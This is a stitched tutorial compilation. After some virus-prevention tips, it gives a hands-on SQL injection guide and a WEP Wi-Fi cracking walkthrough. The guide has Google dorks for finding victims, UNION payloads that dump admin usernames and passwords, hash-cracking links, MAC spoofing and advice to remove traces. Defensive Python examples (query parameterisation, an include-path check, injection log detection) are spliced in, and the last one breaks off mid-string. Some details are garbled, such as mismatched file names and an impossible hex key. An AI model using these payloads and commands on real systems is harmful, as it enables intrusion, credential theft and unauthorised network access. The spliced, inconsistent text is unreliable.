you've forgotten that extensions are actually turned off, you might think this is a text file and open
it. This is really an executable Visual Basic Script virus file and could do
serious damage.
The countermeasure is to turn off "Hide file extensions" in Windows.

How to stop virus or trojan attacks


If you want to know whether your system is infected by viruses or trojans, then these
are certain signs to look for:
1. Your computer might be running slower than normal.
2. Some programs might open without your permission.
3. System start-up takes too much time.
4. Various error messages appear on the screen when you open something, or even without
opening anything.
5. The system registry has been disabled or Folder Options is missing.
6. Most importantly, the antivirus shows messages about detecting viruses from time to time.
7. While scanning your system with any antivirus or anti-spyware tool it shows
viruses, and you notice that the viruses are not being deleted.
and much more.
Have you ever thought about the reason why your system got infected? What has
infected your system, and if it was done by one of your friends, how did he do it? Surely not,
or in some cases you have tried to find the answer but were not able to get a proper
answer. But the story is different here: I will tell you all the ways your system can get
infected, how you can protect it, and if it is already infected how you can resolve the
problem. So here are a few ways your system gets infected; some of you might know
this, but for some reason you have ignored them.

How a System Gets Infected Because of Negligence?

1. Using cracked versions of software, especially security software like antivirus,
anti-spyware etc.
Why I have said this is the first and major cause of infection is because of the following
simple reason: all hackers know that the general internet user always searches for
cracked versions of software and wishes to use them for free, and hackers take advantage
of that. You will now be thinking, how does this help hackers? We know that almost all antivirus
programs flag each and every keygen as a virus or some trojan depending upon its type. Now if we
all know that, then how could hackers forget this fact? So what they do is attach
trojans and viruses to these files, and when your antivirus shows it as a virus
you ignore the alert and keep the keygen, meaning the trojan, running.
NOTE: And guys, an important note for you all: if your antivirus doesn't show any keygen
or crack as a virus then don't ever think that it's not a virus; it is the most dangerous
thing. Why dangerous? Because now the hacker has used some more brain to fool you: he
has made the virus undetectable by simply editing the hex code of the original virus. So what is
the moral of the story? Please don't use cracked versions.
Now you will all be thinking that if we don't use cracked versions then how will we be able
to get full versions of the software. Don't worry, when I am here there is no fear; drink beer and
enjoy everything for free. Its solution will be in the solutions step, just read the article.
2. Pen drive or USB drive:
The biggest cause of infection of your system is USB drives and external hard disks.
Now how does a virus enter your system using USB drives? You have connected your
USB drive to your friend's computer and by chance (sorry, it's for sure, i.e. 100%) your
friend's system is infected by a virus or Trojan, and it is the property of a virus that it
replicates itself using memory. So when you connect your USB drive to your friend's computer
your USB drive is now infected by the virus. Now when you connect this USB drive to your PC, it is
the property of Windows that it searches the files on a newly connected device and
autoruns the device, and to do this it loads the index of your USB drive's file system into
memory; now if the USB drive has a virus, it is the property of the virus that it replicates itself using
system memory. Now if you are using a good antivirus, your antivirus will pop up warning
and alert messages, and sometimes you ignore them, which means your system is also
infected. For the USB drive virus solution keep reading the article.
3. Downloading things from unknown sites:
Most users search for things over the internet and wherever they find their
desired result, meaning the file they want, they start downloading it from that site only.
Now how does it affect your system? Suppose you want to download a wallpaper, say of Katrina
Kaif. Now hackers know the fact that Katrina has a huge fan following and users will
surely download it. Then what they do is simply bind their malicious code
with some of the files, and when a user downloads it his system is infected, and he can never
imagine that the virus has come from the wallpaper that he downloaded from an unknown
site. For its solution read on in the article.
4. The most important one: becoming a hacker like me (ROFL, but it's the truth).
Why I have mentioned this should be clear from the above discussion. Most
internet users are always curious to know ways to hack a friend's email account or
his system, and for this they download all types of junk from the internet, and believe me
99.9% of this junk contains viruses and Trojans that send your information to the
providers. Now I don't say stop hacking, but try to follow some basic steps to learn
hacking, and first of all you must know how to protect yourself from such fake
software. For its solution read on in the article.


Now, after discussing the ways your system gets infected by your simple
negligence, it is time you should know how to fix them and protect your system from all
types of viruses and trojans.

HOW TO STOP VIRUS OR TROJANS ??


1. Using a good antivirus:
There is a common misconception among internet users that a full antivirus provides
better security. Yes, it's 100% true, but full antiviruses means paid ones, not cracked ones.
There are several other solutions that you will get absolutely free, and I
guarantee that they will protect your system 100% with just a little configuration.
Best free antivirus: Avira Personal Antivirus, i.e. AntiVir.
You can download Avira for free from:
http://www.filehippo.com/download_antivir/
Now, after downloading the antivirus, this is what you have to do to make it as good as paid
antiviruses:
a. Install the antivirus and update it. Note that updating the antivirus regularly is compulsory.
Don't worry, it's not your work; it will update itself automatically whenever an update is
available.
b. After installing, at the top right-hand corner you will see a CONFIGURATION button.
Just click on it and a new window will pop up.
c. Now at the top left-hand side you will see a check box with "Expert" written in front of it. Click
on that and you will see several things in it. Now do the following settings one by one:
1. Click on Scanner, click on all files, set the Scanner Priority to high and click on
apply.
2. Click on Guard, click on all files, click on Scan while reading and writing and
then click apply.
3. Click on General, now click on select all and click on apply. In the General tab only, go to the
WMI section, click on advanced process protection and then click on apply.
4. After doing that, restart your PC.
Now you have made your free antivirus equivalent to a paid one.

Best free anti-spyware: Spyware Terminator with Crawler web security toolbar.
Download it for free:
http://www.filehippo.com/download_spyware_terminator/
Install Spyware Terminator with the web security toolbar. Now the following problems
are solved:
1. No Trojan can attack you.
2. Protection from malicious websites and much more.

2. Solution for cracked software:

As I have mentioned earlier, never download cracks and keygens directly to your system,
but there are several other methods. While you are searching for a crack or keygen, first try
to search for a serial key; if you find it then that's awesome, and if not, what to do?
Before downloading any crack or keygen, go to the website:

Now copy the download link of the keygen or crack into the URL box provided on the website.
This website contains all the world-famous antiviruses and it will scan the file for you; if it
contains any virus just ignore it, otherwise have fun with the crack or keygen.

3. Pen drive or USB drive solution:

How can you protect your system from being infected by a pen drive? Just do the
following three things; the rest is taken care of by your antivirus.
1. Turn off AutoPlay for devices:
To do it, go to Start Menu > RUN > type gpedit.msc and press enter > User
Configuration > Administrative Templates > System > Turn off Autoplay > click on
enable and then select all drives.
2. Turn off the Computer Browser service:
To do it, go to Start Menu > RUN > type services.msc and press enter > then find the
Computer Browser service, disable it and restart your system.
3. Most important one: always scan pen drives or external hard drives after connecting
them.

4. Downloading things from unknown sites

Solution:
The solution to this problem is already provided: the web browser security toolbar will help
you in surfing only secured and genuine websites, and if you want to visit a site and download something,
VirusTotal will help you to identify whether the file is infected or not.

5. Now for hackers like me, i.e. a method to use or test hack tools.
Why I have mentioned this is simply because hackers always take advantage of the
noobish trick of attaching viruses to files and naming them as hack tools. So avoid
them if you are too curious like me. Then there are several ways to handle it:
1. Use Deep Freeze on the C drive: For testing hack tools always use Deep Freeze, as after
the next restart your system will be in the same position as it was previously.
2. Install VirtualBox and inside VirtualBox install another Windows, and test all hack tools
using the virtual Windows. This will protect your system from being infected. Also it will give
you more knowledge about handling viruses and other situations, like what to do when
something goes wrong.
3. Create two to three fake email IDs and use them for testing keyloggers and other
fake email hacking software.
For some more security tips you can also read my previous article:

HACKING WEB SERVER


Hello friends, welcome back to the hacking class. Today I will explain all the methods that are
being used to hack a website or a website's database. This is the first part of the class "How to
hack a website or website's database", and in this I will introduce all website hacking
methods. Today I will give you the overview, and in later classes we will discuss them one by
one with practical examples. So guys, get ready for the first part of the hacking websites class.
Don't worry, I will also tell you how to protect your websites from these attacks, and other
methods like hardening of SQL and hardening of web servers, and key knowledge about
CHMOD rights, i.e. what thing should be given what rights.

Note: This post is for Educational Purposes only.

What are the basic things you should know before website hacking?
First of all, everything is optional as I will start from scratch. But you need at least basic
knowledge of the following things:
1. Basics of HTML, SQL, PHP.
2. Basic knowledge of JavaScript.
3. Basic knowledge of servers, i.e. how servers work.
4. And most important, expertise in removing traces, otherwise you have to suffer the consequences.
Now the first two things you can learn from a very famous website for basics of website design
with basics of HTML, SQL, PHP and JavaScript:
http://www.w3schools.com/

And for the fourth point, that you should be expert in removing traces: for this you can refer
to the first 5 hacking classes and especially read these two:
1. Hiding yourself from being traced.
2. Removing your traces

As we know, traces are very important. Please don't ignore them, otherwise you can be in big
trouble for simply doing nothing. So please take care of this step.

METHODS OF HACKING WEBSITE:

1. SQL INJECTION
2. CROSS SITE SCRIPTING
3. REMOTE FILE INCLUSION
4. LOCAL FILE INCLUSION
5. DDOS ATTACK
6. EXPLOITING VULNERABILITY.

1. SQL INJECTION
First of all, what is SQL injection? SQL injection is a type of security exploit or loophole in
which an attacker injects SQL code through a web form or manipulates URLs based on
SQL parameters. It exploits web applications that use client-supplied SQL queries.
The primary form of SQL injection consists of direct insertion of code into user-input variables that
are concatenated with SQL commands and executed. A less direct attack injects malicious code into
strings that are destined for storage in a table or as metadata. When the stored strings are
subsequently concatenated into a dynamic SQL command, the malicious code is executed.
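The "direct insertion into user-input variables" described above is easiest to see side by side with its fix. The following Python code is an added example, not from the original guide: it uses an in-memory SQLite table (constructed) standing in for a products.php?id= lookup, and contrasts a concatenated query, which breaks with a database error on a stray quote, with a validated and parameterised version that treats the same input as plain data.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the guide's products.php?id= lookup."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(5, "router", 49.0), (7, "switch", 99.0)])
    conn.commit()
    return conn


def lookup_unsafe(conn, user_id):
    """The injectable pattern: the request parameter is pasted into the SQL text.

    A value such as 7' becomes ... WHERE id = 7' and the database parser fails,
    which is exactly the syntax error the guide later uses as its vulnerability check."""
    sql = "SELECT id, name, price FROM products WHERE id = " + user_id
    return conn.execute(sql).fetchone()


def lookup_safe(conn, user_id):
    """Hardened form: validate the type first, then bind the value as a parameter.

    The parameter is sent as data, so no input can change the query structure,
    and a malformed id is simply treated as 'no such product'."""
    try:
        id_value = int(user_id)          # the id is numeric by contract; reject anything else
    except (TypeError, ValueError):
        return None
    return conn.execute(
        "SELECT id, name, price FROM products WHERE id = ?", (id_value,)
    ).fetchone()


def observe(lookup, conn, user_id):
    """Report what an outside client can tell from the response: a row, no row,
    or a database error (the signal an attacker probes for)."""
    try:
        row = lookup(conn, user_id)
    except sqlite3.Error:
        return "db-error"
    return "row" if row else "no-row"


if __name__ == "__main__":
    db = make_db()
    for value in ("7", "7'"):
        print(f"{value!r:6} unsafe={observe(lookup_unsafe, db, value):9} "
              f"safe={observe(lookup_safe, db, value)}")
```

The parameterised version also never leaks the database's own error text, which removes the signal the quote test depends on.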


2. CROSS SITE SCRIPTING


Cross site scripting (XSS) occurs when a user inputs malicious data into a website,
which causes the application to do something it wasn't intended to do. XSS attacks
are very popular, and some of the biggest websites have been affected by them,
including the FBI, CNN, eBay, Apple, Microsoft, and AOL.
Some website features commonly vulnerable to XSS attacks are:
- Search engines
- Login forms
- Comment fields
Cross-site scripting holes are web application vulnerabilities that allow attackers to bypass client-side
security mechanisms normally imposed on web content by modern browsers. By finding ways of
injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive
page content, session cookies, and a variety of other information maintained by the browser on behalf
of the user. Cross-site scripting attacks are therefore a special case of code injection.
I will explain this in detail in later hacking classes. So keep reading.

3. REMOTE FILE INCLUSION


Remote file inclusion is the most often found vulnerability on websites.
Remote File Inclusion (RFI) occurs when a remote file, usually a shell (a graphical interface for
browsing remote files and running your own code on a server), is included into a website, which allows
the hacker to execute server-side commands as the currently logged-on user and have access to files on
the server. With this power the hacker can continue on to use local
exploits to escalate his privileges and take over the whole system.
RFI can lead to the following serious things on a website:
- Code execution on the web server
- Code execution on the client side, such as JavaScript, which can lead to other attacks such as
  cross site scripting (XSS)
- Denial of Service (DoS)
- Data theft/manipulation

4. LOCAL FILE INCLUSION


Local File Inclusion (LFI) is when you have the ability to browse through the server by means of
directory traversal. One of the most common uses of LFI is to discover the /etc/passwd file. This file
contains the user information of a Linux system. Hackers find sites vulnerable to LFI the same way I
discussed for RFIs.
Let's say a hacker found a vulnerable site, www.target-site.com/index.php?p=about; by means of
directory traversal he would try to browse to the /etc/passwd file:
www.target-site.com/index.php?p=../../../../../../../etc/passwd
I will explain it in detail with practical website examples in later sequential classes on Website
Hacking.
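Both RFI and LFI above come down to an include handler that trusts the ?p= parameter. As an added example (not part of the original article), the following Python function shows the check such a handler should perform: it refuses anything carrying a URL scheme or host (remote inclusion), resolves the requested name against the page directory and refuses any result that escapes it (the ../ traversal shown above), and can restrict names to an allowlist. The page directory /var/www/pages and the allowlist are constructed values.

```python
import posixpath
from urllib.parse import urlsplit

# Constructed values: where the includable page templates live, and the only
# page names the application actually needs to serve.
PAGE_DIR = "/var/www/pages"
ALLOWED_PAGES = {"home", "about", "contact", "news"}


def resolve_include(page_param, page_dir=PAGE_DIR, allowed=None):
    """Map a ?p= value to the file the server may include, or None to refuse it.

    Refuses: empty or NUL-bearing input, anything with a URL scheme or host
    (remote file inclusion), names outside the optional allowlist, and any path
    that normalises to a location outside page_dir (directory traversal)."""
    if not page_param or "\x00" in page_param:
        return None
    parts = urlsplit(page_param)
    if parts.scheme or parts.netloc:        # http://..., php://..., //host/...
        return None
    if allowed is not None and page_param not in allowed:
        return None
    page_dir = posixpath.normpath(page_dir)
    candidate = posixpath.normpath(posixpath.join(page_dir, page_param + ".php"))
    # After normalisation every ../ has been applied; the result must still sit
    # under page_dir. This is the check that stops ../../../etc/passwd, and also
    # an absolute path, which posixpath.join would otherwise accept as-is.
    if not candidate.startswith(page_dir + "/"):
        return None
    return candidate


def classify_requests(values, allowed=None):
    """Resolve a batch of ?p= values; refused ones (None) are what a defender logs."""
    return {v: resolve_include(v, allowed=allowed) for v in values}


if __name__ == "__main__":
    probes = ["about", "../../../../../../../etc/passwd",
              "http://remote.invalid/shell.txt", "about/../../config"]
    for value, result in classify_requests(probes).items():
        print(f"{value!r:45} -> {result or 'REFUSED'}")
```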

5. DDOS ATTACK
Simply called a distributed denial of service attack. A denial-of-service attack (DoS attack)
or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer
resource unavailable to its intended users. Although the means to carry out, motives for, and targets of
a DoS attack may vary, it generally consists of the concerted efforts of a person or people to prevent an
Internet site or service from functioning efficiently or at all, temporarily or indefinitely. In a DDoS
attack we consume the bandwidth and resources of a website and make it unavailable to its
legitimate users.
For a more detailed hack on DDoS visit:

6. EXPLOITING VULNERABILITY
It's not a new category; it comprises the above five categories, but I mentioned it separately because there
are several exploits which cannot be covered in the above five categories. So I will explain them
individually with examples. The basic idea behind this is to find the vulnerability in the website and
exploit it to get admin or moderator privileges so that you can manipulate things easily.

SQL INJECTION
Hello friends, in my previous class on how to hack websites I explained the
various topics that we will cover in the hacking classes. Let's start today with the first
topic: Hacking Websites using SQL injection tutorial. If you have missed the previous
hacking class, don't worry, read it here.

So guys, let's start our tutorial of Hacking Websites using the SQL injection technique.
First of all, I will provide you a brief introduction to SQL injection.

Note: This article is for Educational Purposes only. Please don't misuse
it. Isoftdl and I are not responsible for any misuse done by you.

MySQL is a very common database system that websites use these days, and
you will be surprised by the fact that it is the most vulnerable database system ever. It
has unlimited loopholes and fixing them is a very tedious task. Here we will discuss
how to exploit those vulnerabilities manually without any tool.

Hacking Websites using SQL Injection

STEPS TO HACK WEBSITES USING SQL INJECTION
1. Finding the target and vulnerable websites
First of all we must find our target website. I have collected a lot of dorks, i.e. the
vulnerability points of websites. Some Google searches can be utilized
to find vulnerable websites. Below are examples of some queries.

Examples: Open the Google and copy paste these queries

inurl:index.php?id=

inurl:trainers.php?id=


inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

Search Google for more Google dorks to hack websites. I cannot put them on my
website as they are too critical to discuss. We can discuss them in the comments of this
post, so keep posting and reading there.

2. Checking for vulnerability on the website

Suppose we have a website like this:

h**p://www.site.com/products.php?id=7

To test this URL, we add a quote to it:

h**p://www.site.com/products.php?id=7'

On executing it, if we get an error like this: "You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right ..."
or something like that, that means the target website is vulnerable to SQL
injection and you can hack it.

3). Find the number of columns

To find the number of columns we use the statement ORDER BY (it tells the database how to
order the result). So how do we use it? Well, just keep incrementing the number until we get an
error.

h**p://www.site.com/products.php?id=5 order by 1/* > no error

h**p://www.site.com/products.php?id=5 order by 2/* > no error

h**p://www.site.com/products.php?id=5 order by 3/* > no error

h**p://www.site.com/products.php?id=5 order by 4/* > Error (we get a message like
"Unknown column 4 in order clause" or something like that)

That means that it has 3 columns, because we got an error on 4.

4). Check for the UNION function

With UNION we can select more data in one SQL statement.

So we have

h**p://www.site.com/products.php?id=5 union all select 1,2,3/*

(we already found that the number of columns is 3 in the previous step)

If we see some numbers on the screen, i.e. 1 or 2 or 3, then the UNION works.

5). Check for the MySQL version

h**p://www.site.com/products.php?id=5 union all select 1,2,3/*

NOTE: if /* is not working or you get some error, then try

it is a comment and it is important for our query to work properly.

Let's say that we have number 2 on the screen; now to check for the version
we replace the number 2 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar.

It should look like this:


h**p://www.site.com/products.php?id=5 union all select 1,@@version,3/*

If you get an error like "union + illegal mix of collations (IMPLICIT + COERCIBLE)":

I didn't see any paper covering this problem, so I must write it.

What we need is the convert() function, i.e.

h**p://www.site.com/products.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex(), i.e.

h**p://www.site.com/products.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get the MySQL version.

6). Getting table and column names

Well, if the MySQL version is less than 5 (i.e. 4.1.33, 4.1.12) we must guess table and column names
in most cases (later I will describe the method for MySQL greater than 5).
Common table names are: user/s, admin/s, member/s

Common column names are: username, user, usr, user_name, password, pass,
passwd, pwd etc.
i.e. it would be

h**p://www.site.com/products.php?id=5 union all select 1,2,3 from admin/*

(we see number 2 on the screen like before, and that's good)

We know that the table admin exists.

Now to check column names:

h**p://www.site.com/products.php?id=5 union all select 1,username,3 from admin/*

(if you get an error, then try another column name)
We get a username displayed on the screen; an example would be admin, or superadmin etc.

Now to check if the column password exists:

h**p://www.site.com/products.php?id=5 union all select 1,password,3 from admin/*

(if you get an error, then try another column name)
We see the password on the screen as a hash or in plain text; it depends on how the database
is set up, i.e. MD5 hash, MySQL hash, SHA1.
Now we must complete the query to make it look nice.
For that we can use the concat() function (it joins strings), i.e.
h**p://www.site.com/products.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that I put 0x3a; it's the hex value for : (so 0x3a is the hex value for a colon).

(There is another way for that: char(58), the ASCII value for :)

h**p://www.site.com/products.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

Now we get username:password displayed on the screen, i.e. admin:admin or admin:somehash.
When you have this, you can log in as admin or some superuser.
If you can't guess the right table name, you can always try mysql.user (default).
It has user and password columns, so an example would be

h**p://www.site.com/products.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

7). MySQL 5
Like I said before, I'm going to explain how to get table and column names
in MySQL greater than 5.

For this we need information_schema. It holds all tables and columns in the database.

To get tables we use table_name and information_schema.tables, i.e.

h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables/*


Here we replace our number 2 with table_name to get the first table from
information_schema.tables displayed on the screen. Now we must add LIMIT to the end of the query
to list out all tables, i.e.

h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

Note that I put 0,1 (get 1 result starting from the 0th).
Now to view the second table, we change limit 0,1 to limit 1,1, i.e.

h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

The second table is displayed.

For the third table we put limit 2,1, i.e.

h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing until you get something useful like db_admin, poll_user, auth,
auth_user etc.

To get the column names the method is the same.


Here we use column_name and information_schema.columns.

The method is the same as above, so an example would be

h**p://www.site.com/products.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

The first column is displayed.

The second one (we change limit 0,1 to limit 1,1), i.e.

h**p://www.site.com/products.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing until you get something like
username, user, login, password, pass, passwd etc.

If you want to display column names for a specific table use this query (WHERE clause).
Let's say that we found the table users, i.e.

h**p://www.site.com/products.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name=users/*

Now we get the column names in the table users displayed. Just using LIMIT we can list all
columns in the table users.
Note that this won't work if magic quotes is ON.
Let's say that we found the columns user, pass and email.

Now to complete the query to put them all together.

For that we use concat(), which I described earlier, i.e.

h**p://www.site.com/products.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/

What we get here is user:pass:email from the table users.

Example: admin:hash:whatever@blabla.com

But the passwords are in hash format so we need to crack the hash. Note that 90% of hashes
are crackable but 10% are still there which are unable to be cracked. So don't feel bad if
some hash doesn't crack.
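Steps 1 to 7 above describe what an injection attempt looks like from the attacker's side. As an added example (not from the original guide), the following Python code shows the defender's side: a small scanner that URL-decodes web server access log entries and flags the request patterns those steps produce (a quote after a numeric id, ORDER BY enumeration, UNION SELECT, information_schema reads, version probes and comment trailers), then counts flagged requests per source address. The log lines are constructed samples in Apache combined format, not real traffic.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Mar/2016:10:00:01 +0000] "GET /products.php?id=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Mar/2016:10:00:05 +0000] "GET /products.php?id=7%27 HTTP/1.1" 500 812 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Mar/2016:10:00:09 +0000] "GET /products.php?id=5%20order%20by%204/* HTTP/1.1" 500 812 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Mar/2016:10:00:15 +0000] "GET /products.php?id=5%20union%20all%20select%201,@@version,3/* HTTP/1.1" 200 5300 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2016:10:01:00 +0000] "GET /search.php?q=order+history HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3})'
)

# Each rule is (name, pattern) and is matched against the URL-decoded request
# path, because the payload arrives percent-encoded. The comments map each
# rule to the step of the guide whose request it catches.
RULES = [
    ("quote-probe",     re.compile(r"""=\d+['"]""")),                        # step 2: id=7'
    ("order-by-enum",   re.compile(r"\border\s+by\s+\d+", re.I)),            # step 3
    ("union-select",    re.compile(r"\bunion\b.*\bselect\b", re.I)),         # step 4
    ("schema-read",     re.compile(r"information_schema|mysql\.user", re.I)), # steps 6 and 7
    ("version-probe",   re.compile(r"@@version|\bversion\s*\(", re.I)),      # step 5
    ("comment-trailer", re.compile(r"/\*|--\s|#$")),                         # query terminators
]


def parse_line(line):
    """Return a dict for one access log entry, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["decoded"] = unquote_plus(entry["path"])
    entry["status"] = int(entry["status"])
    return entry


def matched_rules(decoded_path):
    """Names of every rule whose pattern appears in the decoded request path."""
    return [name for name, pattern in RULES if pattern.search(decoded_path)]


def scan_log(text):
    """Return flagged entries: ip, decoded request, status and the rules that fired.

    A 5xx status on a flagged request is the error-based signal the guide relies on,
    so it is kept alongside the rule names for alert scoring."""
    hits = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        rules = matched_rules(entry["decoded"])
        if rules:
            hits.append({"ip": entry["ip"], "request": entry["decoded"],
                         "status": entry["status"], "rules": rules})
    return hits


def count_by_ip(hits):
    """Number of flagged requests per source address, for threshold-based alerts."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    flagged = scan_log(SAMPLE_LOG)
    for hit in flagged:
        print(f'{hit["ip"]:14} {hit["status"]} {",".join(hit["rules"]):40} {hit["request"]}')
    print(count_by_ip(flagged))
```

The benign search for "order history" is left unflagged on purpose: the ORDER BY rule requires the keyword pair plus a number, which is what the enumeration step actually sends.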

For cracking MD5 hash values you can use this:

1) Check on the net whether this hash has been cracked before:
http://www.md5decrypter.co.uk

2) Crack the password with the help of a site:
http://www.milw0rm.com/cracker/insert.php
or
http://passcracking.com/index.php

3) Use MD5 cracking software:
Download:
http://rapidshare.com/files/13696796CF_2.10_2b.rar

Password = OwlsNest
STEPS TO HACK WIFI OR WIRELESS PASSWORD

1. Get the Backtrack Linux CD. Backtrack Linux Live CD (the best Linux available for hackers,
with more than 2000 hacking tools inbuilt).
Download Backtrack Linux Live CD from here: CLICK HERE

2. SCAN TO GET THE VICTIM

Get the victim to attack, that is, the one whose password you want to hack or crack.
Now insert the Backtrack Linux CD into your CD drive and boot it. Once it has started, click on
the black box in the lower left corner to load up a KONSOLE. Now you should start your
Wifi card. To do so, type:
airmon-ng

You will see the name of your wireless card (mine is named ath0). From here on out,
replace ath0 with the name of your card. Now type:

airmon-ng stop ath0

then type:


ifconfig wifi0 down

then type:

macchanger --mac 00:11:22:33:44:55 wifi0

then type:

airmon-ng start wifi0

The above steps I have explained are to spoof yourself from being traced. In the above step
we are spoofing our MAC address; this will keep us undiscovered.

Now type:
airodump-ng ath0
All of the above steps in one screenshot:


Now you will see a list of wireless networks in the Konsole. Some will have a better
signal than others, and it is always a good idea to pick one that has the best signal
strength; otherwise it will take a huge amount of time to crack or hack the password, or you may
not be able to crack it at all.
Once you see the network list, select the network you want to hack. To freeze
the airodump screen, HOLD the CTRL key and press C.
Now you will see something like this:


3. SELECTING NETWORK FOR HACKING

Now find the network that you want to crack and MAKE SURE that it says the
encryption for that network is WEP. If it says WPA or any variation of WPA, then
move on; you can still crack WPA with Backtrack and some other tools, but it is a
whole other ball game and you need to master WEP first.


Once you've decided on a network, take note of its channel number and BSSID. The
BSSID will look something like this:
00:23:69:bb:2d:of
The channel number will be under a heading that says CH,
as shown in this figure:


Now in the same KONSOLE window type:

airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0

The file name can be whatever you want. This file is the place where airodump is
going to store the packets of info that you receive, to crack later. You don't even put in
an extension; just pick a random word that you will remember. I usually make mine
Ben because I can always remember it. It's simply because I love
ben10. hhahahahaha :D
Note: If you want to crack more than one network in the same session, you must have
different file names for each one or it won't work. I usually name them ben1, ben2,
etc.
Once you have typed in that last command, the airodump screen will change and start
to show your computer gathering packets. You will also see a heading marked IV
with a number underneath it. This stands for Initialization Vector, but in general
terms all this means is packets of info that contain characters of the password.
Once you gain a minimum of 5,000 of these IVs, you can try to crack the password.
I've cracked some right at 5,000 and others have taken over 60,000. It just depends
on how long and difficult they made the password. The more difficult the password, the more
packets you will need to crack it.

4. Cracking the WEP password



Now leave this Konsole window up and running and open up a 2nd Konsole window.
In this window type:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

This sends some commands to the router that basically tell it to associate your
computer even though you are not officially connected with the password. If this
command is successful, you should see about 4 lines of text print out, with the last
one saying something similar to "Association successful :-)".
If this happens, then good! You are almost there.
Now type:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0

This will generate a bunch of text, and then you will see a line where your computer is
gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what
these mean; just know that these are your meal tickets. Now you just sit and wait.
Once your computer finally gathers an ARP request, it will send it back to the router
and begin to generate hundreds of ARP and ACK per second. Sometimes this starts
to happen within seconds; sometimes you have to wait up to a few minutes. Just be
patient. When it finally does happen, switch back to your first Konsole window and
you should see the number underneath IV starting to rise rapidly. This is great! It
means you are almost finished! When this number reaches AT LEAST 5,000, then
you can start your password crack. It will probably take more than this, but I always
start my password cracking at 5,000 just in case they have a really weak password.
Now you need to open up a 3rd and final Konsole window. This will be where we
actually crack the password.
Now type:
aircrack-ng -b (bssid) (filename)-01.cap
Remember the file name you made up earlier? Mine was Ben. Don't put a space
between it and -01.cap here. Type it as you see it. So for me, I would type wepkey01.cap
Once you have done this you will see aircrack fire up and begin to crack the
password. Typically you have to wait for more like 10,000 to 20,000 IVs before it will
crack. If this is the case, aircrack will test what you've got so far and then it will say
something like "not enough IVs. Retry at 10,000."

DON'T DO ANYTHING! It will stay running; it is just letting you know that it is on
pause until more IVs are gathered. Once you pass the 10,000 mark it will
automatically fire up again and try to crack it. If this fails it will say "not enough IVs.
Retry at 15,000." and so on until it finally gets it.
If you do everything correctly up to this point, before too long you will have the
password! Now, if the password looks goofy, don't worry, it will still work. Some
passwords are saved in ASCII format, in which case aircrack will show you exactly
what characters they typed in for their password. Sometimes, though, the password
is saved in HEX format, in which case the computer will show you the HEX
encryption of the password. It doesn't matter either way, because you can type in
either one and it will connect you to the network.

Take note, though, that the password will always be displayed in aircrack with a
colon after every 2 characters. So for instance, if the password was secret, it would
be displayed as:
se:cr:et

This would obviously be the ASCII format. If it was a HEX encrypted password that
was something like 0FKW9427VF, then it would still display as:
0F:KW:94:27:VF


Just omit the colons from the password, boot back into whatever operating system
you use, try to connect to the network, and type in the password without the colons,
and presto! You are in!
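Added here as an example that is not part of the study guide: a small Python audit over the CSV that airodump-ng writes next to the (file name)-01.cap used above, listing the access points still on WEP or no encryption, together with the birthday-bound arithmetic behind WEP's 24-bit IV. The column order is assumed to follow airodump-ng's CSV header and the sample rows are constructed.

```python
"""Added example, not from the study guide: an audit of airodump-ng's CSV output
(the -w <prefix> run above also writes <prefix>-01.csv) that lists access points
still on WEP or no encryption, plus the arithmetic behind WEP's IV weakness.
Column order is assumed to match airodump-ng's CSV header; rows are constructed."""
import csv
import io
import math

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:23:69:BB:2D:0F, 2016-03-01 10:00:00, 2016-03-01 10:09:00,  6,  54, WEP , WEP, OPN, -40, 120, 5231,   0.  0.  0.  0,   7, HomeNet, 
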